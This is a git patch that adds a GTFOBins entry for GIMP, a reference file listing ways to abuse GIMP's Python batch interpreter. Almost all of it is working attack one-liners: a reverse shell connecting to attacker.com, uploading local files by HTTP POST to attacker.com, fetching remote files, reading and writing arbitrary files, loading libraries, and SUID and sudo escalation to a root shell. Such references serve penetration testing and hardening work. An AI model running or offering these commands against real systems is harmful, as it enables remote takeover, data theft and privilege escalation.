From 9180d550e7fca5de3989f29b47d7782e8884b02b Mon Sep 17 00:00:00 2001 From: Emilio Date: Mon, 21 Jan 2019 20:53:48 +0000 Subject: [PATCH] Add gimp thanks to https://twitter.com/Geluchat/status/1083743529388687361 --- _gtfobins/gimp.md | 51 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 _gtfobins/gimp.md diff --git a/_gtfobins/gimp.md b/_gtfobins/gimp.md new file mode 100644 index 0000000..fee1d16 --- /dev/null +++ b/_gtfobins/gimp.md @@ -0,0 +1,51 @@ +--- +functions: + shell: + - code: gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system("sh")' + reverse-shell: + - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + gimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket() + s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) + [os.dup2(s.fileno(),fd) for fd in (0,1,2)] + pty.spawn("/bin/sh")' + file-upload: + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u + else: import urllib as u, urllib2 as r + r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e + if sys.version_info.major == 3: import http.server as s, socketserver as ss + else: import SimpleHTTPServer as s, SocketServer as ss + ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' + file-download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + gimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e + if sys.version_info.major == 3: import urllib.request as r + else: import urllib as r + r.urlretrieve(e["URL"], e["LFILE"])' + file-write: + - code: | + LFILE=file_to_write + gimp -idf --batch-interpreter=python-fu-eval -b 'open("file_to_write", "wb").write("DATA")' + file-read: + - code: gimp -idf --batch-interpreter=python-fu-eval -b 'print(open("file_to_read").read())' + library-load: + - code: gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + suid: + - code: ./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl("/bin/sh", "sh", "-p")' + sudo: + - code: sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system("sh")' +---